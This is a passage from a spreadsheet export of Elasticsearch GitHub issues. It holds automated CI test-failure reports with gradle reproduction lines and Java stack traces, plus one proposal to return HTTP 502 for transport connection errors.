    <t>**Build Scans:** - [elasticsearch-periodic #5321 / release-tests](https://gradle-enterprise.elastic.co/s/jyrnzsmwci3pk) - [elasticsearch-pull-request #45572 / release-tests](https://gradle-enterprise.elastic.co/s/j4i756bs3u4tm) - [elasticsearch-pull-request #45528 / release-tests](https://gradle-enterprise.elastic.co/s/7ytjhywudkcpe) - [elasticsearch-pull-request #45454 / release-tests](https://gradle-enterprise.elastic.co/s/opupzuedyh7xy) - [elasticsearch-periodic #5309 / release-tests](https://gradle-enterprise.elastic.co/s/7zdy2lvjsycr4) - [elasticsearch-periodic #5303 / release-tests](https://gradle-enterprise.elastic.co/s/hxdhhq46djmpa) - [elasticsearch-pull-request #45409 / release-tests](https://gradle-enterprise.elastic.co/s/wjlncfil6euwi) - [elasticsearch-periodic #5297 / release-tests](https://gradle-enterprise.elastic.co/s/3ljn5jyiywcno) - [elasticsearch-periodic #5291 / release-tests](https://gradle-enterprise.elastic.co/s/yabxk4tgrhxmq) **Reproduction Line:**  ./gradlew ":x-pack:plugin:yamlRestTest" --tests "org.elasticsearch.xpack.test.rest.XPackRestIT.test {p0=migrate/10_reindex/Test Reindex With Nonexistent Data Stream}" -Dtests.seed=FFE1DC7DB5CD5155 -Dbuild.snapshot=false -Dtests.jvm.argline="-Dbuild.snapshot=false" -Dlicense.key=x-pack/license-tools/src/test/resources/public.key -Dtests.locale=tt-RU -Dtests.timezone=Europe/Astrakhan -Druntime.java=23  **Applicable branches:** 8.x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xpack.test.rest.XPackRestIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Bp0%3Dmigrate%2F10_reindex%2FTest%20Reindex%20With%20Nonexistent%20Data%20Stream%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [migrate/10_reindex:22]: the error message was expected to match the provided regex but didn't Expected: resource_not_found_exception but: was "no handler found for uri [/_migration/reindex?error_trace=true] and method [POST]"  **Issue Reasons:** - [8.x] 9 consecutive failures in step release-tests - [8.x] 9 failures in test test {p0=migrate/10_reindex/Test Reindex With Nonexistent Data Stream} (3.5% fail rate in 259 executions) - [8.x] 9 failures in step release-tests (100.0% fail rate in 9 executions) - [8.x] 5 failures in pipeline elasticsearch-periodic (83.3% fail rate in 6 executions) - [8.x] 4 failures in pipeline elasticsearch-pull-request (8.7% fail rate in 46 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/118320</t>
  </si>
  <si>
    <t>Change ConnectTransportException response code to 502</t>
  </si>
  <si>
    <t>According to [RFC 9110  15.6.3](https://www.rfc-editor.org/rfc/rfc9110.html#section-15.6.3), the `502 Bad Gateway` response code is appropriate whenever: &gt; the server, while acting as a gateway or proxy, received an invalid response from an inbound server it accessed while attempting to fulfill the request. These days we consider the ES REST to be acting as a gateway to the cluster (or clusters) being accessed, so that seems like a more appropriate code to use when returning a `ConnectTransportException` than todays 500. More practically, our clients generally retry on a 502, but not on a 500, and retrying on a `ConnectTransportException` seems like the right thing to do. Relates ES-10214</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/118401</t>
  </si>
  <si>
    <t>[CI] XPackRestIT test {p0=migrate/20_reindex_status/Test get reindex status with nonexistent task id} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic #5318 / release-tests](https://gradle-enterprise.elastic.co/s/fjc2j243jmpfy) - [elasticsearch-pull-request #45667 / rest-compatibility](https://gradle-enterprise.elastic.co/s/rypq6lchovres) - [elasticsearch-pull-request #45661 / rest-compatibility](https://gradle-enterprise.elastic.co/s/wq7lv4m2u34km) - [elasticsearch-pull-request #45652 / rest-compatibility](https://gradle-enterprise.elastic.co/s/aywgsxnbt5tyu) **Reproduction Line:**  ./gradlew ":x-pack:plugin:yamlRestTest" --tests "org.elasticsearch.xpack.test.rest.XPackRestIT.test {p0=migrate/20_reindex_status/Test get reindex status with nonexistent task id}" -Dtests.seed=310019ECCC8EFF65 -Dbuild.snapshot=false -Dtests.jvm.argline="-Dbuild.snapshot=false" -Dlicense.key=x-pack/license-tools/src/test/resources/public.key -Dtests.locale=et-EE -Dtests.timezone=Etc/GMT+1 -Druntime.java=23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xpack.test.rest.XPackRestIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Bp0%3Dmigrate%2F20_reindex_status%2FTest%20get%20reindex%20status%20with%20nonexistent%20task%20id%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [migrate/20_reindex_status:9]: the error message was expected to match the provided regex but didn't Expected: resource_not_found_exception but: was "no handler found for uri [/_migration/reindex/does_not_exist/_status?error_trace=true] and method [GET]"  **Issue Reasons:** - [main] 4 failures in test test {p0=migrate/20_reindex_status/Test get reindex status with nonexistent task id} (6.9% fail rate in 58 executions) - [main] 3 failures in step rest-compatibility (23.1% fail rate in 13 executions) - [main] 3 failures in pipeline elasticsearch-pull-request (10.0% fail rate in 30 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/118405</t>
  </si>
  <si>
    <t>[CI] InferenceCrudIT testUnifiedCompletionInference failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic-platform-support #5300 / sles-15_platform-support-unix](https://gradle-enterprise.elastic.co/s/l5ext2q4rzbme) - [elasticsearch-periodic #5264 / release-tests](https://gradle-enterprise.elastic.co/s/l4are4stun45o) - [elasticsearch-intake #14065 / part2](https://gradle-enterprise.elastic.co/s/wkeuskqgc4f5o) - [elasticsearch-periodic #5258 / release-tests](https://gradle-enterprise.elastic.co/s/xkh4xi4dj37do) - [elasticsearch-periodic #5252 / release-tests](https://gradle-enterprise.elastic.co/s/5mzmi4acxwywi) **Reproduction Line:**  ./gradlew ":x-pack:plugin:inference:qa:inference-service-tests:javaRestTest" --tests "org.elasticsearch.xpack.inference.InferenceCrudIT.testUnifiedCompletionInference" -Dtests.seed=CACC8856B6AE2643 -Dtests.locale=tr -Dtests.timezone=Asia/Novosibirsk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xpack.inference.InferenceCrudIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(testUnifiedCompletionInference),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Expected: "{\"id\":\"id\",\"choices\":[{\"delta\":{\"content\":\"AKS0\"},\"index\":0}],\"model\":\"gpt-4o-2024-08-06\",\"object\":\"chat.completion.chunk\"}" but: was "{\"id\":\"id\",\"choices\":[{\"delta\":{\"content\":\"IAKS0\"},\"index\":0}],\"model\":\"gpt-4o-2024-08-06\",\"object\":\"chat.completion.chunk\"}"  **Issue Reasons:** - [main] 3 consecutive failures in step release-tests - [main] 5 failures in test testUnifiedCompletionInference (1.8% fail rate in 271 executions) - [main] 3 failures in step release-tests (100.0% fail rate in 3 executions) - [main] 3 failures in pipeline elasticsearch-periodic (42.9% fail rate in 7 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/119035</t>
  </si>
  <si>
    <t>[CI] EsqlClientYamlIT test {p0=esql/190_lookup_join/basic} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic-platform-support #5441 / ubuntu-2404_platform-support-unix](https://gradle-enterprise.elastic.co/s/q4pznwjioeuvk) - [elasticsearch-periodic-platform-support #5441 / opensuse-leap-15_platform-support-unix](https://gradle-enterprise.elastic.co/s/df3qr5pmnnxti) **Reproduction Line:**  ./gradlew ":x-pack:plugin:esql:qa:server:multi-node:yamlRestTest" --tests "org.elasticsearch.xpack.esql.qa.multi_node.EsqlClientYamlIT.test {p0=esql/190_lookup_join/non-lookup index}" -Dtests.seed=7633F1619AC73E9C -Dtests.locale=hi-IN -Dtests.timezone=America/Monterrey -Druntime.java=23  **Applicable branches:** 8.x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xpack.esql.qa.multi_node.EsqlClientYamlIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Bp0%3Desql%2F190_lookup_join%2Fbasic%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [esql/190_lookup_join:23]: expected [2xx] status code but api [indices.create] returned [400 Bad Request] [{"error":{"root_cause":[{"type":"illegal_argument_exception","reason":"index with [lookup] mode must have [index.number_of_shards] set to 1 or unset; provided 2","stack_trace":"org.elasticsearch.ElasticsearchException$1: index with [lookup] mode must have [index.number_of_shards] set to 1 or unset; provided 2\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.ElasticsearchException.guessRootCauses(ElasticsearchException.java:706)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.ElasticsearchException.generateFailureXContent(ElasticsearchException.java:634)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.rest.RestResponse.build(RestResponse.java:201)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.rest.RestResponse.&lt;init&gt;(RestResponse.java:160)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.rest.RestResponse.&lt;init&gt;(RestResponse.java:121)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.rest.action.RestActionListener.onFailure(RestActionListener.java:54)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeOnFailure(ActionListenerImplementations.java:75)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListener$3.onFailure(ActionListener.java:410)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.tasks.TaskManager$1.onFailure(TaskManager.java:215)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeOnFailure(ActionListenerImplementations.java:75)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.DelegatingActionListener.onFailure(DelegatingActionListener.java:32)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations$RunBeforeActionListener.onFailure(ActionListenerImplementations.java:346)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeOnFailure(ActionListenerImplementations.java:75)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListener$3.onFailure(ActionListener.java:410)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeOnFailure(ActionListenerImplementations.java:75)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.DelegatingActionListener.onFailure(DelegatingActionListener.java:32)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations$RunBeforeActionListener.onFailure(ActionListenerImplementations.java:346)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeOnFailure(ActionListenerImplementations.java:75)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListener$3.onFailure(ActionListener.java:410)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.support.master.TransportMasterNodeAction$AsyncSingleAction$1.handleException(TransportMasterNodeAction.java:278)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.transport.TransportService$ContextRestoreResponseHandler.handleException(TransportService.java:1510)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.transport.InboundHandler.doHandleException(InboundHandler.java:476)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.transport.InboundHandler.handleException(InboundHandler.java:463)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.transport.InboundHandler.handlerResponseError(InboundHandler.java:454)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.transport.InboundHandler.executeResponseHandler(InboundHandler.java:148)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.transport.InboundHandler.messageReceived(InboundHandler.java:125)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.transport.InboundHandler.inboundMessage(InboundHandler.java:98)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.transport.TcpTransport.inboundMessage(TcpTransport.java:822)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.transport.InboundPipeline.forwardFragments(InboundPipeline.java:125)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.transport.InboundPipeline.doHandleBytes(InboundPipeline.java:97)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.transport.InboundPipeline.handleBytes(InboundPipeline.java:62)\n\tat org.elasticsearch.transport.netty4@8.18.0-SNAPSHOT/org.elasticsearch.transport.netty4.Netty4MessageInboundHandler.channelRead(Netty4MessageInboundHandler.java:55)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:444)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:412)\n\tat io.netty.codec@4.1.115.Final/io.netty.handler.codec.MessageToMessageDecoder.channelRead(MessageToMessageDecoder.java:107)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:444)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:412)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1357)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:440)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:420)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:868)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.nio.AbstractNioByteChannel$NioByteUnsafe.read(AbstractNioByteChannel.java:166)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.nio.NioEventLoop.processSelectedKey(NioEventLoop.java:788)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.nio.NioEventLoop.processSelectedKeysPlain(NioEventLoop.java:689)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.nio.NioEventLoop.processSelectedKeys(NioEventLoop.java:652)\n\tat io.netty.transport@4.1.115.Final/io.netty.channel.nio.NioEventLoop.run(NioEventLoop.java:562)\n\tat io.netty.common@4.1.115.Final/io.netty.util.concurrent.SingleThreadEventExecutor$4.run(SingleThreadEventExecutor.java:997)\n\tat io.netty.common@4.1.115.Final/io.netty.util.internal.ThreadExecutorMap$2.run(ThreadExecutorMap.java:74)\n\tat java.base/java.lang.Thread.run(Thread.java:1575)\nCaused by: java.lang.IllegalArgumentException: index with [lookup] mode must have [index.number_of_shards] set to 1 or unset; provided 2\n\tat org.elasticsearch.index.IndexMode$4.validateWithOtherSettings(IndexMode.java:322)\n\tat org.elasticsearch.index.IndexSettings$3.validate(IndexSettings.java:723)\n\tat org.elasticsearch.index.IndexSettings$3.validate(IndexSettings.java:717)\n\tat org.elasticsearch.common.settings.Setting.get(Setting.java:563)\n\tat org.elasticsearch.common.settings.Setting.get(Setting.java:535)\n\tat org.elasticsearch.common.settings.Setting.get(Setting.java:694)\n\tat org.elasticsearch.common.settings.AbstractScopedSettings.get(AbstractScopedSettings.java:747)\n\tat org.elasticsearch.index.IndexSettings.&lt;init&gt;(IndexSettings.java:969)\n\tat org.elasticsearch.indices.IndicesService.createIndexService(IndicesService.java:739)\n\tat org.elasticsearch.indices.IndicesService.withTempIndexService(IndicesService.java:711)\n\tat org.elasticsearch.cluster.metadata.MetadataCreateIndexService.applyCreateIndexWithTemporaryService(MetadataCreateIndexService.java:500)\n\tat org.elasticsearch.cluster.metadata.MetadataCreateIndexService.applyCreateIndexRequestWithV1Templates(MetadataCreateIndexService.java:623)\n\tat org.elasticsearch.cluster.metadata.MetadataCreateIndexService.applyCreateIndexRequest(MetadataCreateIndexService.java:448)\n\tat org.elasticsearch.cluster.metadata.MetadataCreateIndexService$1.execute(MetadataCreateIndexService.java:327)\n\tat org.elasticsearch.cluster.service.MasterService$UnbatchedExecutor.execute(MasterService.java:574)\n\tat org.elasticsearch.cluster.service.MasterService.innerExecuteTasks(MasterService.java:1075)\n\tat org.elasticsearch.cluster.service.MasterService.executeTasks(MasterService.java:1038)\n\tat org.elasticsearch.cluster.service.MasterService.executeAndPublishBatch(MasterService.java:245)\n\tat org.elasticsearch.cluster.service.MasterService$BatchingTaskQueue$Processor.lambda$run$2(MasterService.java:1691)\n\tat org.elasticsearch.action.ActionListener.run(ActionListener.java:452)\n\tat org.elasticsearch.cluster.service.MasterService$BatchingTaskQueue$Processor.run(MasterService.java:1688)\n\tat org.elasticsearch.cluster.service.MasterService$5.lambda$doRun$0(MasterService.java:1283)\n\tat org.elasticsearch.action.ActionListener.run(ActionListener.java:452)\n\tat org.elasticsearch.cluster.service.MasterService$5.doRun(MasterService.java:1262)\n\tat org.elasticsearch.common.util.concurrent.ThreadContext$ContextPreservingAbstractRunnable.doRun(ThreadContext.java:1044)\n\tat org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:27)\n\tat java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144)\n\tat java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642)\n\tat java.lang.Thread.run(Thread.java:1575)\n"}],"type":"illegal_argument_exception","reason":"index with [lookup] mode must have [index.number_of_shards] set to 1 or unset; provided 2","stack_trace":"java.lang.IllegalArgumentException: index with [lookup] mode must have [index.number_of_shards] set to 1 or unset; provided 2\n\tat org.elasticsearch.index.IndexMode$4.validateWithOtherSettings(IndexMode.java:322)\n\tat org.elasticsearch.index.IndexSettings$3.validate(IndexSettings.java:723)\n\tat org.elasticsearch.index.IndexSettings$3.validate(IndexSettings.java:717)\n\tat org.elasticsearch.common.settings.Setting.get(Setting.java:563)\n\tat org.elasticsearch.common.settings.Setting.get(Setting.java:535)\n\tat org.elasticsearch.common.settings.Setting.get(Setting.java:694)\n\tat org.elasticsearch.common.settings.AbstractScopedSettings.get(AbstractScopedSettings.java:747)\n\tat org.elasticsearch.index.IndexSettings.&lt;init&gt;(IndexSettings.java:969)\n\tat org.elasticsearch.indices.IndicesService.createIndexService(IndicesService.java:739)\n\tat org.elasticsearch.indices.IndicesService.withTempIndexService(IndicesService.java:711)\n\tat org.elasticsearch.cluster.metadata.MetadataCreateIndexService.applyCreateIndexWithTemporaryService(MetadataCreateIndexService.java:500)\n\tat org.elasticsearch.cluster.metadata.MetadataCreateIndexService.applyCreateIndexRequestWithV1Templates(MetadataCreateIndexService.java:623)\n\tat org.elasticsearch.cluster.metadata.MetadataCreateIndexService.applyCreateIndexRequest(MetadataCreateIndexService.java:448)\n\tat org.elasticsearch.cluster.metadata.MetadataCreateIndexService$1.execute(MetadataCreateIndexService.java:327)\n\tat org.elasticsearch.cluster.service.MasterService$UnbatchedExecutor.execute(MasterService.java:574)\n\tat org.elasticsearch.cluster.service.MasterService.innerExecuteTasks(MasterService.java:1075)\n\tat org.elasticsearch.cluster.service.MasterService.executeTasks(MasterService.java:1038)\n\tat org.elasticsearch.cluster.service.MasterService.executeAndPublishBatch(MasterService.java:245)\n\tat org.elasticsearch.cluster.service.MasterService$BatchingTaskQueue$Processor.lambda$run$2(MasterService.java:1691)\n\tat org.elasticsearch.action.ActionListener.run(ActionListener.java:452)\n\tat org.elasticsearch.cluster.service.MasterService$BatchingTaskQueue$Processor.run(MasterService.java:1688)\n\tat org.elasticsearch.cluster.service.MasterService$5.lambda$doRun$0(MasterService.java:1283)\n\tat org.elasticsearch.action.ActionListener.run(ActionListener.java:452)\n\tat org.elasticsearch.cluster.service.MasterService$5.doRun(MasterService.java:1262)\n\tat org.elasticsearch.common.util.concurrent.ThreadContext$ContextPreservingAbstractRunnable.doRun(ThreadContext.java:1044)\n\tat org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:27)\n\tat java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1144)\n\tat java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:642)\n\tat java.lang.Thread.run(Thread.java:1575)\n"},"status":400}]  **Issue Reasons:** - [8.x] 2 consecutive failures in test test {p0=esql/190_lookup_join/basic} - [8.x] 2 failures in test test {p0=esql/190_lookup_join/basic} (2.4% fail rate in 83 executions) **Note:** This issue was created using new test triage automation. Please report issues or feedback to es-delivery.</t>
  </si>
  <si>
    <t>https://github.com/elastic/elasticsearch/issues/119036</t>
  </si>
  <si>
    <t>[CI] EsqlClientYamlIT test {p0=esql/190_lookup_join/non-lookup index} failing</t>
  </si>
  <si>
    <t>**Build Scans:** - [elasticsearch-periodic-platform-support #5441 / ubuntu-2404_platform-support-unix](https://gradle-enterprise.elastic.co/s/q4pznwjioeuvk) - [elasticsearch-periodic-platform-support #5441 / opensuse-leap-15_platform-support-unix](https://gradle-enterprise.elastic.co/s/df3qr5pmnnxti) **Reproduction Line:**  ./gradlew ":x-pack:plugin:esql:qa:server:multi-node:yamlRestTest" --tests "org.elasticsearch.xpack.esql.qa.multi_node.EsqlClientYamlIT.test {p0=esql/190_lookup_join/non-lookup index}" -Dtests.seed=7633F1619AC73E9C -Dtests.locale=hi-IN -Dtests.timezone=America/Monterrey -Druntime.java=23  **Applicable branches:** 8.x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xpack.esql.qa.multi_node.EsqlClientYamlIT),title:'Suite',type:optionsListControl),'144933da-5c1b-4257-a969-7f43455a7901':(dataViewId:fbbdc689-be23-4b3d-8057-aa402e9ed0c5,fieldName:name.keyword,order:2,selectedOptions:!(test%20%7Bp0%3Desql%2F190_lookup_join%2Fnon-lookup%20index%7D),title:'Test',type:optionsListControl **Failure Message:**  java.lang.AssertionError: Failure at [esql/190_lookup_join:23]: expected [2xx] status code but api [indices.create] returned [400 Bad Request] [{"error":{"root_cause":[{"type":"illegal_argument_exception","reason":"index with [lookup] mode must have [index.number_of_shards] set to 1 or unset; provided 2","stack_trace":"org.elasticsearch.ElasticsearchException$1: index with [lookup] mode must have [index.number_of_shards] set to 1 or unset; provided 2\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.ElasticsearchException.guessRootCauses(ElasticsearchException.java:706)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.ElasticsearchException.generateFailureXContent(ElasticsearchException.java:634)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.rest.RestResponse.build(RestResponse.java:201)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.rest.RestResponse.&lt;init&gt;(RestResponse.java:160)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.rest.RestResponse.&lt;init&gt;(RestResponse.java:121)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.rest.action.RestActionListener.onFailure(RestActionListener.java:54)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeOnFailure(ActionListenerImplementations.java:75)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListener$3.onFailure(ActionListener.java:410)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.tasks.TaskManager$1.onFailure(TaskManager.java:215)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeOnFailure(ActionListenerImplementations.java:75)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.DelegatingActionListener.onFailure(DelegatingActionListener.java:32)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations$RunBeforeActionListener.onFailure(ActionListenerImplementations.java:346)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeOnFailure(ActionListenerImplementations.java:75)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListener$3.onFailure(ActionListener.java:410)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeOnFailure(ActionListenerImplementations.java:75)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.DelegatingActionListener.onFailure(DelegatingActionListener.java:32)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations$RunBeforeActionListener.onFailure(ActionListenerImplementations.java:346)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeAcceptException(ActionListenerImplementations.java:64)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListenerImplementations.safeOnFailure(ActionListenerImplementations.java:75)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.ActionListener$3.onFailure(ActionListener.java:410)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.action.support.master.TransportMasterNodeAction$AsyncSingleAction$1.handleException(TransportMasterNodeAction.java:278)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.transport.TransportService$ContextRestoreResponseHandler.handleException(TransportService.java:1510)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.transport.InboundHandler.doHandleException(InboundHandler.java:476)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.transport.InboundHandler.handleException(InboundHandler.java:463)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.transport.InboundHandler.handlerResponseError(InboundHandler.java:454)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.transport.InboundHandler.executeResponseHandler(InboundHandler.java:148)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.transport.InboundHandler.messageReceived(InboundHandler.java:125)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.transport.InboundHandler.inboundMessage(InboundHandler.java:98)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.transport.TcpTransport.inboundMessage(TcpTransport.java:822)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.transport.InboundPipeline.forwardFragments(InboundPipeline.java:125)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.transport.InboundPipeline.doHandleBytes(InboundPipeline.java:97)\n\tat org.elasticsearch.server@8.18.0-SNAPSHOT/org.elasticsearch.transport.InboundPipeline.handleBytes(InboundPipeline.java:62)\n\tat org.elasticsearch.transport.netty4@8.18.0-SNAPSHOT/org.elasticsearch.transport.netty4.Netty4MessageInboundHandler.channelRead(Netty4MessageInboundHandler.java:55)\n\tat 